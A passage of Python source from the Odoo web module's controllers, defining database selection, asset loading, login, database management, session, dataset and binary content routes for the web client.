response = r.app.get_response(r, response, explicit_session=False)
werkzeug.exceptions.abort(response)
def ensure_db(redirect='/web/database/selector'):
# This helper should be used in web client auth="none" routes
# if those routes needs a db to work with.
# If the heuristics does not find any database, then the users will be
# redirected to db selector or any url specified by `redirect` argument.
# If the db is taken out of a query parameter, it will be checked against
# `http.db_filter()` in order to ensure it's legit and thus avoid db
# forgering that could lead to xss attacks.
db = request.params.get('db') and request.params.get('db').strip()
# Ensure db is legit
if db and db not in http.db_filter([db]):
db = None
if db and not request.session.db:
# User asked a specific database on a new session.
# That mean the nodb router has been used to find the route
# Depending on installed module in the database, the rendering of the page
# may depend on data injected by the database route dispatcher.
# Thus, we redirect the user to the same page but with the session cookie set.
# This will force using the database route dispatcher...
r = request.httprequest
url_redirect = werkzeug.urls.url_parse(r.base_url)
if r.query_string:
# in P3, request.query_string is bytes, the rest is text, can't mix them
query_string = iri_to_uri(r.query_string)
url_redirect = url_redirect.replace(query=query_string)
request.session.db = db
abort_and_redirect(url_redirect)
# if db not provided, use the session one
if not db and request.session.db and http.db_filter([request.session.db]):
db = request.session.db
# if no database provided and no database in session, use monodb
if not db:
db = db_monodb(request.httprequest)
# if no db can be found til here, send to the database selector
# the database selector will redirect to database manager if needed
if not db:
werkzeug.exceptions.abort(werkzeug.utils.redirect(redirect, 303))
# always switch the session to the computed db
if db != request.session.db:
request.session.logout()
abort_and_redirect(request.httprequest.url)
request.session.db = db
def module_installed(environment):
# Candidates module the current heuristic is the /static dir
loadable = list(http.addons_manifest)
# Retrieve database installed modules
# TODO The following code should move to ir.module.module.list_installed_modules()
Modules = environment['ir.module.module']
domain = [('state','=','installed'), ('name','in', loadable)]
modules = OrderedDict(
(module.name, module.dependencies_id.mapped('name'))
for module in Modules.search(domain)
)
sorted_modules = topological_sort(modules)
return sorted_modules
def module_installed_bypass_session(dbname):
try:
registry = odoo.registry(dbname)
with registry.cursor() as cr:
return module_installed(
environment=Environment(cr, odoo.SUPERUSER_ID, {}))
except Exception:
pass
return {}
def module_boot(db=None):
server_wide_modules = odoo.conf.server_wide_modules or []
serverside = ['base', 'web']
dbside = []
for i in server_wide_modules:
if i in http.addons_manifest and i not in serverside:
serverside.append(i)
monodb = db or db_monodb()
if monodb:
dbside = module_installed_bypass_session(monodb)
dbside = [i for i in dbside if i not in serverside]
addons = serverside + dbside
return addons
def concat_xml(file_list):
"""Concatenate xml files
:param list(str) file_list: list of files to check
:returns: (concatenation_result, checksum)
:rtype: (bytes, str)
"""
checksum = hashlib.new('sha1')
if not file_list:
return b'', checksum.hexdigest()
root = None
for fname in file_list:
with open(fname, 'rb') as fp:
contents = fp.read()
checksum.update(contents)
fp.seek(0)
try:
xml = ElementTree.parse(fp).getroot()
except ElementTree.ParseError as e:
_logger.error("Could not parse file %s: %s" % (fname, e.msg))
raise e
if root is None:
root = ElementTree.Element(xml.tag)
#elif root.tag != xml.tag:
# raise ValueError("Root tags missmatch: %r != %r" % (root.tag, xml.tag))
for child in xml.getchildren():
root.append(child)
return ElementTree.tostring(root, 'utf-8'), checksum.hexdigest()
def fs2web(path):
"""convert FS path into web path"""
return '/'.join(path.split(os.path.sep))
def manifest_glob(extension, addons=None, db=None, include_remotes=False):
if addons is None:
addons = module_boot(db=db)
else:
addons = addons.split(',')
r = []
for addon in addons:
manifest = http.addons_manifest.get(addon, None)
if not manifest:
continue
# ensure does not ends with /
addons_path = os.path.join(manifest['addons_path'], '')[:-1]
globlist = manifest.get(extension, [])
for pattern in globlist:
if pattern.startswith(('http://', 'https://', '//')):
if include_remotes:
r.append((None, pattern))
else:
for path in glob.glob(os.path.normpath(os.path.join(addons_path, addon, pattern))):
r.append((path, fs2web(path[len(addons_path):])))
return r
def manifest_list(extension, mods=None, db=None, debug=None):
""" list resources to load specifying either:
mods: a comma separated string listing modules
db: a database name (return all installed modules in that database)
"""
if debug is not None:
_logger.warning("odoo.addons.web.main.manifest_list(): debug parameter is deprecated")
files = manifest_glob(extension, addons=mods, db=db, include_remotes=True)
return [wp for _fp, wp in files]
def get_last_modified(files):
""" Returns the modification time of the most recently modified
file provided
:param list(str) files: names of files to check
:return: most recent modification time amongst the fileset
:rtype: datetime.datetime
"""
files = list(files)
if files:
return max(datetime.datetime.fromtimestamp(os.path.getmtime(f))
for f in files)
return datetime.datetime(1970, 1, 1)
def make_conditional(response, last_modified=None, etag=None, max_age=0):
""" Makes the provided response conditional based upon the request,
and mandates revalidation from clients
Uses Werkzeug's own :meth:`ETagResponseMixin.make_conditional`, after
setting ``last_modified`` and ``etag`` correctly on the response object
:param response: Werkzeug response
:type response: werkzeug.wrappers.Response
:param datetime.datetime last_modified: last modification date of the response content
:param str etag: some sort of checksum of the content (deep etag)
:return: the response object provided
:rtype: werkzeug.wrappers.Response
"""
response.cache_control.must_revalidate = True
response.cache_control.max_age = max_age
if last_modified:
response.last_modified = last_modified
if etag:
response.set_etag(etag)
return response.make_conditional(request.httprequest)
def login_and_redirect(db, login, key, redirect_url='/web'):
request.session.authenticate(db, login, key)
return set_cookie_and_redirect(redirect_url)
def set_cookie_and_redirect(redirect_url):
redirect = werkzeug.utils.redirect(redirect_url, 303)
redirect.autocorrect_location_header = False
return redirect
def clean_action(action):
action.setdefault('flags', {})
action_type = action.setdefault('type', 'ir.actions.act_window_close')
if action_type == 'ir.actions.act_window':
return fix_view_modes(action)
return action
# I think generate_views,fix_view_modes should go into js ActionManager
def generate_views(action):
"""
While the server generates a sequence called "views" computing dependencies
between a bunch of stuff for views coming directly from the database
(the ``ir.actions.act_window model``), it's also possible for e.g. buttons
to return custom view dictionaries generated on the fly.
In that case, there is no ``views`` key available on the action.
Since the web client relies on ``action['views']``, generate it here from
``view_mode`` and ``view_id``.
Currently handles two different cases:
* no view_id, multiple view_mode
* single view_id, single view_mode
:param dict action: action descriptor dictionary to generate a views key for
"""
view_id = action.get('view_id') or False
if isinstance(view_id, (list, tuple)):
view_id = view_id[0]
# providing at least one view mode is a requirement, not an option
view_modes = action['view_mode'].split(',')
if len(view_modes) > 1:
if view_id:
raise ValueError('Non-db action dictionaries should provide '
'either multiple view modes or a single view '
'mode and an optional view id.\n\n Got view '
'modes %r and view id %r for action %r' % (
view_modes, view_id, action))
action['views'] = [(False, mode) for mode in view_modes]
return
action['views'] = [(view_id, view_modes[0])]
def fix_view_modes(action):
""" For historical reasons, Odoo has weird dealings in relation to
view_mode and the view_type attribute (on window actions):
* one of the view modes is ``tree``, which stands for both list views
and tree views
* the choice is made by checking ``view_type``, which is either
``form`` for a list view or ``tree`` for an actual tree view
This methods simply folds the view_type into view_mode by adding a
new view mode ``list`` which is the result of the ``tree`` view_mode
in conjunction with the ``form`` view_type.
TODO: this should go into the doc, some kind of "peculiarities" section
:param dict action: an action descriptor
:returns: nothing, the action is modified in place
"""
if not action.get('views'):
generate_views(action)
if action.pop('view_type', 'form') != 'form':
return action
if 'view_mode' in action:
action['view_mode'] = ','.join(
mode if mode != 'tree' else 'list'
for mode in action['view_mode'].split(','))
action['views'] = [
[id, mode if mode != 'tree' else 'list']
for id, mode in action['views']
]
return action
def _local_web_translations(trans_file):
messages = []
try:
with open(trans_file) as t_file:
po = babel.messages.pofile.read_po(t_file)
except Exception:
return
for x in po:
if x.id and x.string and "openerp-web" in x.auto_comments:
messages.append({'id': x.id, 'string': x.string})
return messages
def xml2json_from_elementtree(el, preserve_whitespaces=False):
""" xml2json-direct
Simple and straightforward XML-to-JSON converter in Python
New BSD Licensed
http://code.google.com/p/xml2json-direct/
"""
res = {}
if el.tag[0] == "{":
ns, name = el.tag.rsplit("}", 1)
res["tag"] = name
res["namespace"] = ns[1:]
else:
res["tag"] = el.tag
res["attrs"] = {}
for k, v in el.items():
res["attrs"][k] = v
kids = []
if el.text and (preserve_whitespaces or el.text.strip() != ''):
kids.append(el.text)
for kid in el:
kids.append(xml2json_from_elementtree(kid, preserve_whitespaces))
if kid.tail and (preserve_whitespaces or kid.tail.strip() != ''):
kids.append(kid.tail)
res["children"] = kids
return res
def binary_content(xmlid=None, model='ir.attachment', id=None, field='datas', unique=False,
filename=None, filename_field='datas_fname', download=False, mimetype=None,
default_mimetype='application/octet-stream', related_id=None, access_mode=None, access_token=None,
env=None):
return request.registry['ir.http'].binary_content(
xmlid=xmlid, model=model, id=id, field=field, unique=unique, filename=filename,
filename_field=filename_field, download=download, mimetype=mimetype,
default_mimetype=default_mimetype, related_id=related_id, access_mode=access_mode, access_token=access_token,
env=env)
#----------------------------------------------------------
# Odoo Web web Controllers
#----------------------------------------------------------
class Home(http.Controller):
@http.route('/', type='http', auth="none")
def index(self, s_action=None, db=None, **kw):
return http.local_redirect('/web', query=request.params, keep_hash=True)
# ideally, this route should be `auth="user"` but that don't work in non-monodb mode.
@http.route('/web', type='http', auth="none")
def web_client(self, s_action=None, **kw):
ensure_db()
if not request.session.uid:
return werkzeug.utils.redirect('/web/login', 303)
if kw.get('redirect'):
return werkzeug.utils.redirect(kw.get('redirect'), 303)
request.uid = request.session.uid
try:
context = request.env['ir.http'].webclient_rendering_context()
response = request.render('web.webclient_bootstrap', qcontext=context)
response.headers['X-Frame-Options'] = 'DENY'
return response
except AccessError:
return werkzeug.utils.redirect('/web/login?error=access')
@http.route('/web/dbredirect', type='http', auth="none")
def web_db_redirect(self, redirect='/', **kw):
ensure_db()
return werkzeug.utils.redirect(redirect, 303)
def _login_redirect(self, uid, redirect=None):
return redirect if redirect else '/web'
@http.route('/web/login', type='http', auth="none", sitemap=False)
def web_login(self, redirect=None, **kw):
ensure_db()
request.params['login_success'] = False
if request.httprequest.method == 'GET' and redirect and request.session.uid:
return http.redirect_with_hash(redirect)
if not request.uid:
request.uid = odoo.SUPERUSER_ID
values = request.params.copy()
try:
values['databases'] = http.db_list()
except odoo.exceptions.AccessDenied:
values['databases'] = None
if request.httprequest.method == 'POST':
old_uid = request.uid
try:
uid = request.session.authenticate(request.session.db, request.params['login'], request.params['password'])
request.params['login_success'] = True
return http.redirect_with_hash(self._login_redirect(uid, redirect=redirect))
except odoo.exceptions.AccessDenied as e:
request.uid = old_uid
if e.args == odoo.exceptions.AccessDenied().args:
values['error'] = _("Wrong login/password")
else:
values['error'] = e.args[0]
else:
if 'error' in request.params and request.params.get('error') == 'access':
values['error'] = _('Only employee can access this database. Please contact the administrator.')
if 'login' not in values and request.session.get('auth_login'):
values['login'] = request.session.get('auth_login')
if not odoo.tools.config['list_db']:
values['disable_database_manager'] = True
# otherwise no real way to test debug mode in template as ?debug =>
# values['debug'] = '' but that's also the fallback value when
# missing variables in qweb
if 'debug' in values:
values['debug'] = True
response = request.render('web.login', values)
response.headers['X-Frame-Options'] = 'DENY'
return response
@http.route('/web/become', type='http', auth='user', sitemap=False)
def switch_to_admin(self):
uid = request.env.user.id
if request.env.user._is_system():
uid = request.session.uid = odoo.SUPERUSER_ID
request.env['res.users']._invalidate_session_cache()
request.session.session_token = security.compute_session_token(request.session, request.env)
return http.local_redirect(self._login_redirect(uid), keep_hash=True)
class WebClient(http.Controller):
@http.route('/web/webclient/csslist', type='json', auth="none")
def csslist(self, mods=None):
return manifest_list('css', mods=mods)
@http.route('/web/webclient/jslist', type='json', auth="none")
def jslist(self, mods=None):
return manifest_list('js', mods=mods)
@http.route('/web/webclient/locale/<string:lang>', type='http', auth="none")
def load_locale(self, lang):
magic_file_finding = [lang.replace("_", '-').lower(), lang.split('_')[0]]
for code in magic_file_finding:
try:
return http.Response(
werkzeug.wsgi.wrap_file(
request.httprequest.environ,
file_open('web/static/lib/moment/locale/%s.js' % code, 'rb')
),
content_type='application/javascript; charset=utf-8',
headers=[('Cache-Control', 'max-age=36000')],
direct_passthrough=True,
)
except IOError:
_logger.debug("No moment locale for code %s", code)
return request.make_response("", headers=[
('Content-Type', 'application/javascript'),
('Cache-Control', 'max-age=36000'),
])
@http.route('/web/webclient/qweb', type='http', auth="none", cors="*")
def qweb(self, mods=None, db=None):
files = [f[0] for f in manifest_glob('qweb', addons=mods, db=db)]
last_modified = get_last_modified(files)
if request.httprequest.if_modified_since and request.httprequest.if_modified_since >= last_modified:
return werkzeug.wrappers.Response(status=304)
content, checksum = concat_xml(files)
return make_conditional(
request.make_response(content, [('Content-Type', 'text/xml')]),
last_modified, checksum)
@http.route('/web/webclient/bootstrap_translations', type='json', auth="none")
def bootstrap_translations(self, mods):
""" Load local translations from *.po files, as a temporary solution
until we have established a valid session. This is meant only
for translating the login page and db management chrome, using
the browser's language. """
# For performance reasons we only load a single translation, so for
# sub-languages (that should only be partially translated) we load the
# main language PO instead - that should be enough for the login screen.
lang = request.lang.split('_')[0]
translations_per_module = {}
for addon_name in mods:
if http.addons_manifest[addon_name].get('bootstrap'):
addons_path = http.addons_manifest[addon_name]['addons_path']
f_name = os.path.join(addons_path, addon_name, "i18n", lang + ".po")
if not os.path.exists(f_name):
continue
translations_per_module[addon_name] = {'messages': _local_web_translations(f_name)}
return {"modules": translations_per_module,
"lang_parameters": None}
@http.route('/web/webclient/translations', type='json', auth="none")
def translations(self, mods=None, lang=None):
request.disable_db = False
if mods is None:
mods = [x['name'] for x in request.env['ir.module.module'].sudo().search_read(
[('state', '=', 'installed')], ['name'])]
if lang is None:
lang = request.context["lang"]
langs = request.env['res.lang'].sudo().search([("code", "=", lang)])
lang_params = None
if langs:
lang_params = langs.read([
"name", "direction", "date_format", "time_format",
"grouping", "decimal_point", "thousands_sep", "week_start"])[0]
# Regional languages (ll_CC) must inherit/override their parent lang (ll), but this is
# done server-side when the language is loaded, so we only need to load the user's lang.
translations_per_module = {}
messages = request.env['ir.translation'].sudo().search_read([
('module', 'in', mods), ('lang', '=', lang),
('comments', 'like', 'openerp-web'), ('value', '!=', False),
('value', '!=', '')],
['module', 'src', 'value', 'lang'], order='module')
for mod, msg_group in itertools.groupby(messages, key=operator.itemgetter('module')):
translations_per_module.setdefault(mod, {'messages': []})
translations_per_module[mod]['messages'].extend({
'id': m['src'],
'string': m['value']}
for m in msg_group)
return {
'lang_parameters': lang_params,
'modules': translations_per_module,
'multi_lang': len(request.env['res.lang'].sudo().get_installed()) > 1,
}
@http.route('/web/webclient/version_info', type='json', auth="none")
def version_info(self):
return odoo.service.common.exp_version()
@http.route('/web/tests', type='http', auth="user")
def test_suite(self, mod=None, **kwargs):
return request.render('web.qunit_suite')
@http.route('/web/tests/mobile', type='http', auth="none")
def test_mobile_suite(self, mod=None, **kwargs):
return request.render('web.qunit_mobile_suite')
@http.route('/web/benchmarks', type='http', auth="none")
def benchmarks(self, mod=None, **kwargs):
return request.render('web.benchmark_suite')
class Proxy(http.Controller):
@http.route('/web/proxy/load', type='json', auth="none")
def load(self, path):
""" Proxies an HTTP request through a JSON request.
It is strongly recommended to not request binary files through this,
as the result will be a binary data blob as well.
:param path: actual request path
:return: file content
"""
from werkzeug.test import Client
from werkzeug.wrappers import BaseResponse
base_url = request.httprequest.base_url
return Client(request.httprequest.app, BaseResponse).get(path, base_url=base_url).data
@http.route('/web/proxy/post/<path:path>', type='http', auth='user', methods=['GET'])
def post(self, path):
"""Effectively execute a POST request that was hooked through user login"""
with request.session.load_request_data() as data:
if not data:
raise werkzeug.exceptions.BadRequest()
from werkzeug.test import Client
from werkzeug.wrappers import BaseResponse
base_url = request.httprequest.base_url
query_string = request.httprequest.query_string
client = Client(request.httprequest.app, BaseResponse)
headers = {'X-Openerp-Session-Id': request.session.sid}
return client.post('/' + path, base_url=base_url, query_string=query_string,
headers=headers, data=data)
class Database(http.Controller):
def _render_template(self, **d):
d.setdefault('manage',True)
d['insecure'] = odoo.tools.config.verify_admin_password('<PASSWORD>')
d['list_db'] = odoo.tools.config['list_db']
d['langs'] = odoo.service.db.exp_list_lang()
d['countries'] = odoo.service.db.exp_list_countries()
d['pattern'] = DBNAME_PATTERN
# databases list
d['databases'] = []
try:
d['databases'] = http.db_list()
d['incompatible_databases'] = odoo.service.db.list_db_incompatible(d['databases'])
except odoo.exceptions.AccessDenied:
monodb = db_monodb()
if monodb:
d['databases'] = [monodb]
return env.get_template("database_manager.html").render(d)
@http.route('/web/database/selector', type='http', auth="none")
def selector(self, **kw):
request._cr = None
return self._render_template(manage=False)
@http.route('/web/database/manager', type='http', auth="none")
def manager(self, **kw):
request._cr = None
return self._render_template()
@http.route('/web/database/create', type='http', auth="none", methods=['POST'], csrf=False)
def create(self, master_pwd, name, lang, password, **post):
try:
if not re.match(DBNAME_PATTERN, name):
raise Exception(_('Invalid database name. Only alphanumerical characters, underscore, hyphen and dot are allowed.'))
# country code could be = "False" which is actually True in python
country_code = post.get('country_code') or False
dispatch_rpc('db', 'create_database', [master_pwd, name, bool(post.get('demo')), lang, password, post['login'], country_code, post['phone']])
request.session.authenticate(name, post['login'], password)
return http.local_redirect('/web/')
except Exception as e:
error = "Database creation error: %s" % (str(e) or repr(e))
return self._render_template(error=error)
@http.route('/web/database/duplicate', type='http', auth="none", methods=['POST'], csrf=False)
def duplicate(self, master_pwd, name, new_name):
try:
if not re.match(DBNAME_PATTERN, new_name):
raise Exception(_('Invalid database name. Only alphanumerical characters, underscore, hyphen and dot are allowed.'))
dispatch_rpc('db', 'duplicate_database', [master_pwd, name, new_name])
return http.local_redirect('/web/database/manager')
except Exception as e:
error = "Database duplication error: %s" % (str(e) or repr(e))
return self._render_template(error=error)
@http.route('/web/database/drop', type='http', auth="none", methods=['POST'], csrf=False)
def drop(self, master_pwd, name):
try:
dispatch_rpc('db','drop', [master_pwd, name])
request._cr = None # dropping a database leads to an unusable cursor
return http.local_redirect('/web/database/manager')
except Exception as e:
error = "Database deletion error: %s" % (str(e) or repr(e))
return self._render_template(error=error)
@http.route('/web/database/backup', type='http', auth="none", methods=['POST'], csrf=False)
def backup(self, master_pwd, name, backup_format = 'zip'):
try:
odoo.service.db.check_super(master_pwd)
ts = datetime.datetime.utcnow().strftime("%Y-%m-%d_%H-%M-%S")
filename = "%s_%s.%s" % (name, ts, backup_format)
headers = [
('Content-Type', 'application/octet-stream; charset=binary'),
('Content-Disposition', content_disposition(filename)),
]
dump_stream = odoo.service.db.dump_db(name, None, backup_format)
response = werkzeug.wrappers.Response(dump_stream, headers=headers, direct_passthrough=True)
return response
except Exception as e:
_logger.exception('Database.backup')
error = "Database backup error: %s" % (str(e) or repr(e))
return self._render_template(error=error)
@http.route('/web/database/restore', type='http', auth="none", methods=['POST'], csrf=False)
def restore(self, master_pwd, backup_file, name, copy=False):
try:
data_file = None
db.check_super(master_pwd)
with tempfile.NamedTemporaryFile(delete=False) as data_file:
backup_file.save(data_file)
db.restore_db(name, data_file.name, str2bool(copy))
return http.local_redirect('/web/database/manager')
except Exception as e:
error = "Database restore error: %s" % (str(e) or repr(e))
return self._render_template(error=error)
finally:
if data_file:
os.unlink(data_file.name)
@http.route('/web/database/change_password', type='http', auth="none", methods=['POST'], csrf=False)
def change_password(self, master_pwd, master_pwd_new):
try:
dispatch_rpc('db', 'change_admin_password', [master_pwd, master_pwd_new])
return http.local_redirect('/web/database/manager')
except Exception as e:
error = "Master password update error: %s" % (str(e) or repr(e))
return self._render_template(error=error)
@http.route('/web/database/list', type='json', auth='none')
def list(self):
"""
Used by Mobile application for listing database
:return: List of databases
:rtype: list
"""
return http.db_list()
class Session(http.Controller):
@http.route('/web/session/get_session_info', type='json', auth="none")
def get_session_info(self):
request.session.check_security()
request.uid = request.session.uid
request.disable_db = False
return request.env['ir.http'].session_info()
@http.route('/web/session/authenticate', type='json', auth="none")
def authenticate(self, db, login, password, base_location=None):
request.session.authenticate(db, login, password)
return request.env['ir.http'].session_info()
@http.route('/web/session/change_password', type='json', auth="user")
def change_password(self, fields):
old_password, new_password,confirm_password = operator.itemgetter('old_pwd', 'new_password','confirm_pwd')(
{f['name']: f['value'] for f in fields})
if not (old_password.strip() and new_password.strip() and confirm_password.strip()):
return {'error':_('You cannot leave any password empty.'),'title': _('Change Password')}
if new_password != confirm_password:
return {'error': _('The new password and its confirmation must be identical.'),'title': _('Change Password')}
msg = _("Error, password not changed !")
try:
if request.env['res.users'].change_password(old_password, new_password):
return {'new_password':<PASSWORD>}
except UserError as e:
msg = e.name
except AccessDenied as e:
msg = e.args[0]
if msg == AccessDenied().args[0]:
msg = _('The old password you provided is incorrect, your password was not changed.')
return {'title': _('Change Password'), 'error': msg}
@http.route('/web/session/get_lang_list', type='json', auth="none")
def get_lang_list(self):
try:
return dispatch_rpc('db', 'list_lang', []) or []
except Exception as e:
return {"error": e, "title": _("Languages")}
@http.route('/web/session/modules', type='json', auth="user")
def modules(self):
# return all installed modules. Web client is smart enough to not load a module twice
return module_installed(environment=request.env(user=odoo.SUPERUSER_ID))
@http.route('/web/session/save_session_action', type='json', auth="user")
def save_session_action(self, the_action):
"""
This method store an action object in the session object and returns an integer
identifying that action. The method get_session_action() can be used to get
back the action.
:param the_action: The action to save in the session.
:type the_action: anything
:return: A key identifying the saved action.
:rtype: integer
"""
return request.session.save_action(the_action)
@http.route('/web/session/get_session_action', type='json', auth="user")
def get_session_action(self, key):
"""
Gets back a previously saved action. This method can return None if the action
was saved since too much time (this case should be handled in a smart way).
:param key: The key given by save_session_action()
:type key: integer
:return: The saved action or None.
:rtype: anything
"""
return request.session.get_action(key)
@http.route('/web/session/check', type='json', auth="user")
def check(self):
request.session.check_security()
return None
@http.route('/web/session/account', type='json', auth="user")
def account(self):
ICP = request.env['ir.config_parameter'].sudo()
params = {
'response_type': 'token',
'client_id': ICP.get_param('database.uuid') or '',
'state': json.dumps({'d': request.db, 'u': ICP.get_param('web.base.url')}),
'scope': 'userinfo',
}
return 'https://accounts.odoo.com/oauth2/auth?' + werkzeug.url_encode(params)
@http.route('/web/session/destroy', type='json', auth="user")
def destroy(self):
request.session.logout()
@http.route('/web/session/logout', type='http', auth="none")
def logout(self, redirect='/web'):
request.session.logout(keep_db=True)
return werkzeug.utils.redirect(redirect, 303)
class DataSet(http.Controller):
@http.route('/web/dataset/search_read', type='json', auth="user")
def search_read(self, model, fields=False, offset=0, limit=False, domain=None, sort=None):
return self.do_search_read(model, fields, offset, limit, domain, sort)
def do_search_read(self, model, fields=False, offset=0, limit=False, domain=None
, sort=None):
""" Performs a search() followed by a read() (if needed) using the
provided search criteria
:param str model: the name of the model to search on
:param fields: a list of the fields to return in the result records
:type fields: [str]
:param int offset: from which index should the results start being returned
:param int limit: the maximum number of records to return
:param list domain: the search domain for the query
:param list sort: sorting directives
:returns: A structure (dict) with two keys: ids (all the ids matching
the (domain, context) pair) and records (paginated records
matching fields selection set)
:rtype: list
"""
Model = request.env[model]
records = Model.search_read(domain, fields,
offset=offset or 0, limit=limit or False, order=sort or False)
if not records:
return {
'length': 0,
'records': []
}
if limit and len(records) == limit:
length = Model.search_count(domain)
else:
length = len(records) + (offset or 0)
return {
'length': length,
'records': records
}
@http.route('/web/dataset/load', type='json', auth="user")
def load(self, model, id, fields):
value = {}
r = request.env[model].browse([id]).read()
if r:
value = r[0]
return {'value': value}
def call_common(self, model, method, args, domain_id=None, context_id=None):
return self._call_kw(model, method, args, {})
def _call_kw(self, model, method, args, kwargs):
check_method_name(method)
return call_kw(request.env[model], method, args, kwargs)
@http.route('/web/dataset/call', type='json', auth="user")
def call(self, model, method, args, domain_id=None, context_id=None):
return self._call_kw(model, method, args, {})
@http.route(['/web/dataset/call_kw', '/web/dataset/call_kw/<path:path>'], type='json', auth="user")
def call_kw(self, model, method, args, kwargs, path=None):
return self._call_kw(model, method, args, kwargs)
@http.route('/web/dataset/call_button', type='json', auth="user")
def call_button(self, model, method, args, domain_id=None, context_id=None):
action = self._call_kw(model, method, args, {})
if isinstance(action, dict) and action.get('type') != '':
return clean_action(action)
return False
@http.route('/web/dataset/resequence', type='json', auth="user")
def resequence(self, model, ids, field='sequence', offset=0):
""" Re-sequences a number of records in the model, by their ids
The re-sequencing starts at the first model of ``ids``, the sequence
number is incremented by one after each record and starts at ``offset``
:param ids: identifiers of the records to resequence, in the new sequence order
:type ids: list(id)
:param str field: field used for sequence specification, defaults to
"sequence"
:param int offset: sequence number for first record in ``ids``, allows
starting the resequencing from an arbitrary number,
defaults to ``0``
"""
m = request.env[model]
if not m.fields_get([field]):
return False
# python 2.6 has no start parameter
for i, record in enumerate(m.browse(ids)):
record.write({field: i + offset})
return True
class View(http.Controller):
@http.route('/web/view/edit_custom', type='json', auth="user")
def edit_custom(self, custom_id, arch):
"""
Edit a custom view
:param int custom_id: the id of the edited custom view
:param str arch: the edited arch of the custom view
:returns: dict with acknowledged operation (result set to True)
"""
custom_view = request.env['ir.ui.view.custom'].browse(custom_id)
custom_view.write({ 'arch': arch })
return {'result': True}
class Binary(http.Controller):
def placeholder(self, image='placeholder.png'):
addons_path = http.addons_manifest['web']['addons_path']
return open(os.path.join(addons_path, 'web', 'static', 'src', 'img', image), 'rb').read()
def force_contenttype(self, headers, contenttype='image/png'):
dictheaders = dict(headers)
dictheaders['Content-Type'] = contenttype
return list(dictheaders.items())
@http.route(['/web/content',
'/web/content/<string:xmlid>',
'/web/content/<string:xmlid>/<string:filename>',
'/web/content/<int:id>',
'/web/content/<int:id>/<string:filename>',
'/web/content/<int:id>-<string:unique>',
'/web/content/<int:id>-<string:unique>/<string:filename>',
'/web/content/<int:id>-<string:unique>/<path:extra>/<string:filename>',
'/web/content/<string:model>/<int:id>/<string:field>',
'/web/content/<string:model>/<int:id>/<string:field>/<string:filename>'], type='http', auth="public")
def content_common(self, xmlid=None, model='ir.attachment', id=None, field='datas',
filename=None, filename_field='datas_fname', unique=None, mimetype=None,
download=None, data=None, token=None, access_token=None, related_id=None, access_mode=None,
**kw):
status, headers, content = binary_content(
xmlid=xmlid, model=model, id=id, field=field, unique=unique, filename=filename,
filename_field=filename_field, download=download, mimetype=mimetype,
access_token=access_token, related_id=related_id, access_mode=access_mode)
if status == 304:
response = werkzeug.wrappers.Response(status=status, headers=headers)
elif status == 301:
return werkzeug.utils.redirect(content, code=301)
elif status != 200:
response = request.not_found()
else:
content_base64 = base64.b64decode(content)
headers.append(('Content-Length', len(content_base64)))
response = request.make_response(content_base64, headers)
if token:
response.set_cookie('fileToken', token)
return response
@http.route(['/web/image',
'/web/image/<string:xmlid>',
'/web/image/<string:xmlid>/<string:filename>',
'/web/image/<string:xmlid>/<int:width>x<int:height>',
'/web/image/<string:xmlid>/<int:width>x<int:height>/<string:filename>',
'/web/image/<string:model>/<int:id>/<string:field>',
'/web/image/<string:model>/<int:id>/<string:field>/<string:filename>',
'/web/image/<string:model>/<int:id>/<string:field>/<int:width>x<int:height>',
'/web/image/<string:model>/<int:id>/<string:field>/<int:width>x<int:height>/<string:filename>',
'/web/image/<int:id>',
'/web/image/<int:id>/<string:filename>',
'/web/image/<int:id>/<int:width>x<int:height>',
'/web/image/<int:id>/<int:width>x<int:height>/<string:filename>',
'/web/image/<int:id>-<string:unique>',
'/web/image/<int:id>-<string:unique>/<string:filename>',
'/web/image/<int:id>-<string:unique>/<int:width>x<int:height>',
'/web/image/<int:id>-<string:unique>/<int:width>x<int:height>/<string:filename>'], type='http', auth="public")
def content_image(self, xmlid=None, model='ir.attachment', id=None, field='datas',
filename_field='datas_fname', unique=None, filename=None, mimetype=None,
download=None, width=0, height=0, crop=False, related_id=None, access_mode=None,
access_token=None, avoid_if_small=False, upper_limit=False, signature=False, **kw):
status, headers, content = binary_content(
xmlid=xmlid, model=model, id=id, field=field, unique=unique, filename=filename,
filename_field=filename_field, download=download, mimetype=mimetype,
default_mimetype='image/png', related_id=related_id, access_mode=access_mode, access_token=access_token)
if status == 304:
return werkzeug.wrappers.Response(status=304, headers=headers)
elif status == 301:
return werkzeug.utils.redirect(content, code=301)
elif status != 200 and download:
return request.not_found()
if headers and dict(headers).get('Content-Type', '') == 'image/svg+xml': # we shan't resize svg images
height = 0
width = 0
else:
height = int(height or 0)
width = int(width or 0)
if not content:
content = base64.b64encode(self.placeholder(image='placeholder.png'))
headers = self.force_contenttype(headers, contenttype='image/png')
if not (width or height):
suffix = field.split('_')[-1]
if suffix in ('small', 'medium', 'big'):
content = getattr(odoo.tools, 'image_resize_image_%s' % suffix)(content)
if crop and (width or height):
content = crop_image(content, type='center', size=(width, height), ratio=(1, 1))
elif (width or height):
if not upper_limit:
# resize maximum 500*500
if width > 500:
width = 500
if height > 500:
height = 500
content = odoo.tools.image_resize_image(base64_source=content, size=(width or None, height or None),
encoding='base64', upper_limit=upper_limit,
avoid_if_small=avoid_if_small)
image_base64 = base64.b64decode(content)
headers.append(('Content-Length', len(image_base64)))
response = request.make_response(image_base64, headers)
response.status_code = status
return response
# backward compatibility
@http.route(['/web/binary/image'], type='http', auth="public")
def content_image_backward_compatibility(self, model, id, field, resize=None, **kw):
width = None
height = None
if resize:
width, height = resize.split(",")
return self.content_image(model=model, id=id, field=field, width=width, height=height)
@http.route('/web/binary/upload', type='http', auth="user")
@serialize_exception
def upload(self, callback, ufile):
# TODO: might be useful to have a configuration flag for max-length file uploads
out = """<script language="javascript" type="text/javascript">
var win = window.top.window;
win.jQuery(win).trigger(%s, %s);
</script>"""
try:
data = ufile.read()
args = [len(data), ufile.filename,
ufile.content_type, base64.b64encode(data)]
except Exception as e:
args = [False, str(e)]
return out % (json.dumps(callback), json.dumps(args))
@http.route('/web/binary/upload_attachment', type='http', auth="user")
@serialize_exception
def upload_attachment(self, callback, model, id, ufile):
files = request.httprequest.files.getlist('ufile')
Model = request.env['ir.attachment']
out = """<script language="javascript" type="text/javascript">
var win = window.top.window;
win.jQuery(win).trigger(%s, %s);
</script>"""
args = []
for ufile in files:
filename = ufile.filename
if request.httprequest.user_agent.browser == 'safari':
# Safari sends NFD UTF-8 (where é is composed by 'e' and [accent])
# we need to send it the same stuff, otherwise it'll fail
filename = unicodedata.normalize('NFD', ufile.filename)
try:
attachment = Model.create({
'name': filename,
